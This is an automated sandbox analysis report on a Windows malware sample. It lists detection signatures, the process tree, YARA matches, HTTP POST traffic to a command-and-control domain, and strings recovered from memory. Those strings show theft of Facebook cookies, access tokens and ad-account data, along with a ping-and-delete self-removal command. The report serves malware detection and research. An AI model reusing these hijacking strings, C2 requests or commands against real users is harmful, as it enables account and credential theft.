Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report h1GodtbhC8.exe

Overview

General Information

Sample Name:h1GodtbhC8.exe
Analysis ID:327203
MD5:3ca6df4914385efd4ba9cd239b5ed254
SHA1:b66535ff43334177a5a167b9f2b07ade75484eec
SHA256:0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
Tags:exe

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Antivirus or Machine Learning detection for unpacked file
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • h1GodtbhC8.exe (PID: 5356 cmdline: 'C:\Users\user\Desktop\h1GodtbhC8.exe' MD5: 3CA6DF4914385EFD4BA9CD239B5ED254)
    • setup.exe (PID: 2172 cmdline: 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s MD5: 69C9BA53239D6838D05594D96A36DEA3)
      • aliens.exe (PID: 2992 cmdline: 'C:\Program Files (x86)\71eza90awf48\aliens.exe' MD5: 87698F069716708B6743A580B1D0D0CC)
        • msiexec.exe (PID: 1752 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
        • 1E1C360C582DF797.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)
          • 1607186572092.exe (PID: 2116 cmdline: 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
          • 1607186588295.exe (PID: 6636 cmdline: 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
          • ThunderFW.exe (PID: 7040 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
        • 1E1C360C582DF797.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)
          • cmd.exe (PID: 2416 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5728 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 4948 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 772 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x1576d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
21.2.1E1C360C582DF797.exe.46c0000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.46e0000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.10000000.6.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
25.2.1E1C360C582DF797.exe.4750000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.46e0000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: h1GodtbhC8.exeAvira: detected
Antivirus detection for URL or domainShow sources
Source: http://www.sodown.xyz/index.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: dream.picsVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dllReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted fileShow sources
Source: h1GodtbhC8.exeVirustotal: Detection: 46%Perma Link
Source: h1GodtbhC8.exeMetadefender: Detection: 16%Perma Link
Source: h1GodtbhC8.exeReversingLabs: Detection: 64%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: h1GodtbhC8.exeJoe Sandbox ML: detected
Source: 25.2.1E1C360C582DF797.exe.4330000.4.unpackAvira: Label: TR/Patched.Ren.Gen2
Source: 21.2.1E1C360C582DF797.exe.42a0000.6.unpackAvira: Label: TR/Patched.Ren.Gen2
Source: 4.2.aliens.exe.42c0000.4.unpackAvira: Label: TR/Patched.Ren.Gen2
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,4_2_1001F720
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_6E660F62
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_6E651C23
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0121A534
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123A928 FindFirstFileExA,1_2_0123A928
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0122B820
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00402D09 FindFirstFileA,4_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_004066CC FindFirstFileA,FindClose,4_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001A170 FindFirstFileA,FindClose,4_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose,21_2_026DC704
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8,21_2_026E1F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,21_2_04FA7950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA5A90 FindFirstFileA,FindClose,21_2_04FA5A90

Networking:

barindex
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: iplogger.org
Source: unknownDNS query: name: iplogger.org
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info/ddd HTTP/1.1Host: EF6DF4AF06BA6896.xyzAccept: */*
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1405Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: GET /info/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/du HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 125Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: GET /info/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: GET /info/ddd HTTP/1.1Host: EF6DF4AF06BA6896.xyzAccept: */*
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exeString found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
